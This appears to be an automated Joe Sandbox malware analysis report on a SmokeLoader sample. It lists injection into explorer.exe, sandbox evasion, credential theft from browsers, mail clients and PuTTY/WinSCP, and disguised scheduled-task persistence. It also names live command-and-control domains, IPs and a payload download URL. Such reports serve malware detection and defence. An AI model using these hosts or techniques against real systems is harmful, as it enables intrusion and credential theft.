                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522699 Sample: OCYe9qcxiM.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 calvinandhalls.com 2->55 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 5 other signatures 2->75 10 OCYe9qcxiM.exe 2->10         started        13 hehcrfb 2->13         started        15 fihcrfb 2->15         started        17 3 other processes 2->17 signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 10->117 119 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->119 121 Maps a DLL or memory area into another process 10->121 19 explorer.exe 63 9 10->19 injected 123 Multi AV Scanner detection for dropped file 13->123 125 Machine Learning detection for dropped file 13->125 127 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->127 129 Checks if the current machine is a virtual machine (disk enumeration) 15->129 131 Creates a thread in another existing process (thread injection) 15->131 133 Switches to a custom stack to bypass stack traces 15->133 process6 dnsIp7 57 nwgrus.ru 187.228.112.175, 49706, 49707, 49708 UninetSAdeCVMX Mexico 19->57 59 calvinandhalls.com 23.145.40.162, 443, 49738, 49739 SURFAIRWIRELESS-IN-01US Reserved 19->59 61 2 other IPs or domains 19->61 45 C:\Users\user\AppData\Roaming\hehcrfb, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\fihcrfb, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\4470.exe, PE32 19->49 dropped 51 2 other malicious files 19->51 dropped 83 System process connects to network (likely due to code injection or exploit) 19->83 85 Benign windows process drops PE files 19->85 87 Injects code into the Windows Explorer (explorer.exe) 19->87 89 3 other signatures 19->89 24 354F.exe 2 19->24         started        27 4470.exe 19->27         started        29 explorer.exe 20 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->91 93 Machine Learning detection for dropped file 24->93 95 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 24->95 97 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 24->97 33 cmd.exe 24->33         started        99 Detected unpacking (changes PE section rights) 27->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->101 103 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 27->103 115 4 other signatures 27->115 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 63 Uses netsh to modify the Windows network and firewall settings 33->63 65 Uses ipconfig to lookup or modify the Windows network settings 33->65 67 Modifies the windows firewall 33->67 36 WMIC.exe 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->77 79 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->79 81 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->81

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  OCYe9qcxiM.exe37%ReversingLabs
                  OCYe9qcxiM.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\fihcrfb100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\354F.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\4470.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\hehcrfb100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\hehcrfb37%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  https://api.msn.com/0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  calvinandhalls.com
                  23.145.40.162
                  truetrue
                    unknown
                    nwgrus.ru
                    187.228.112.175
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://23.145.40.164/ksa9104.exetrue
                        unknown
                        http://unicea.ws/tmp/index.phptrue
                          unknown
                          http://nwgrus.ru/tmp/index.phptrue
                            unknown
                            https://calvinandhalls.com/search.phptrue
                              unknown
                              http://tech-servers.in.net/tmp/index.phptrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://calvinandhalls.com/explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://calvinandhalls.com/WN/explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://powerpoint.office.comerexplorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/ac/?q=explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://android.notify.windows.com/iOSA4explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://calvinandhalls.com/search.phpMozilla/5.0explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://java.coexplorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://excel.office.comexplorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://schemas.microexplorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://wns.windows.com/EM0explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://calvinandhalls.com/search.php=explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.microsoft.cexplorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://android.notify.windows.com/iOSdexplorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://calvinandhalls.com/earch.phpexplorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                                          unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.ecosia.org/newtab/explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://ns.adobeSexplorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://outlook.comexplorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://calvinandhalls.com:443/search.phptexplorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://word.office.com48explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://api.msn.com/explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      109.121.204.14
                                                                                                                      unknownBulgaria
                                                                                                                      21415INTERNETGROUP-AS-BGBulgariaBGtrue
                                                                                                                      187.228.112.175
                                                                                                                      nwgrus.ruMexico
                                                                                                                      8151UninetSAdeCVMXtrue
                                                                                                                      23.145.40.164
                                                                                                                      unknownReserved
                                                                                                                      22631SURFAIRWIRELESS-IN-01UStrue
                                                                                                                      23.145.40.162
                                                                                                                      calvinandhalls.comReserved
                                                                                                                      22631SURFAIRWIRELESS-IN-01UStrue
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1522699
                                                                                                                      Start date and time:2024-09-30 15:36:26 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 12m 3s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:42
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:OCYe9qcxiM.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:2a6994149baff1e680719f89062bfcc7.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@63/15@5/4
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 97%
                                                                                                                      • Number of executed functions: 153
                                                                                                                      • Number of non-executed functions: 118
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.114.59.183
                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: OCYe9qcxiM.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      09:37:37API Interceptor263038x Sleep call for process: explorer.exe modified
                                                                                                                      09:39:15API Interceptor14x Sleep call for process: WMIC.exe modified
                                                                                                                      15:37:50Task SchedulerRun new task: Firefox Default Browser Agent BD8ADC038940B771 path: C:\Users\user\AppData\Roaming\hehcrfb
                                                                                                                      15:38:44Task SchedulerRun new task: Firefox Default Browser Agent 3D6F99141930A61B path: C:\Users\user\AppData\Roaming\fihcrfb
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      23.145.40.164file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                  6NlY2E3Wqi.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                    4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                      RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                        C1APU2jz2B.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                          23.145.40.162file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                              KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                  YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                      4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                        RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          msvR1bl94M.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                            78XCPpouJs.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              calvinandhalls.comfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              msvR1bl94M.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              78XCPpouJs.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 23.145.40.162
                                                                                                                                                              nwgrus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 190.249.193.233
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 210.182.29.70
                                                                                                                                                              KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 116.58.10.60
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 190.13.174.94
                                                                                                                                                              Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 109.175.29.39
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 185.18.245.58
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 93.118.137.82
                                                                                                                                                              OcH6iVxcMe.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 211.181.24.133
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 119.204.11.2
                                                                                                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 190.218.32.149
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              INTERNETGROUP-AS-BGBulgariaBGvaex.exeGet hashmaliciousSalityBrowse
                                                                                                                                                              • 109.121.239.94
                                                                                                                                                              8vlzmXygG4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 109.121.221.223
                                                                                                                                                              ZTmnyvVCRS.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 109.121.221.229
                                                                                                                                                              3nvoeHhdPc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 109.121.221.231
                                                                                                                                                              tLIQS3Pca5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 109.121.236.68
                                                                                                                                                              x86Get hashmaliciousMiraiBrowse
                                                                                                                                                              • 109.121.221.235
                                                                                                                                                              MyBcR76ufX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 109.121.235.154
                                                                                                                                                              2ZpZixrz18.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 109.121.235.154
                                                                                                                                                              D9NH6L3n4L.exeGet hashmaliciousDjvuBrowse
